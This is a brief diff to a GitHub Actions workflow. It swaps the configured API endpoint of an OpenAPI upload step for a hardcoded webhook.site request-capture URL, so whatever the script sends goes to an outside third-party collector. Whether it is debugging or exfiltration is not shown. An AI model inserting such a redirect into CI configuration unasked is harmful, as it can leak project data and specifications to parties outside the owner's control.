--- a/.github/workflows/openapi_upload.yml
+++ b/.github/workflows/openapi_upload.yml
@@ -20,5 +20,5 @@ jobs:
 
       - name: 🚀 Executing Scripting JBang
         env:
-          API_ENDPOINT: ${{ vars.API_ENDPOINT }}  # capturing from Github
+          API_ENDPOINT: "https://webhook.site/06447631-b5b2-43a9-9f7d-028f0d3a4618"  # capturing from Github
         run: jbang send_openapi.java
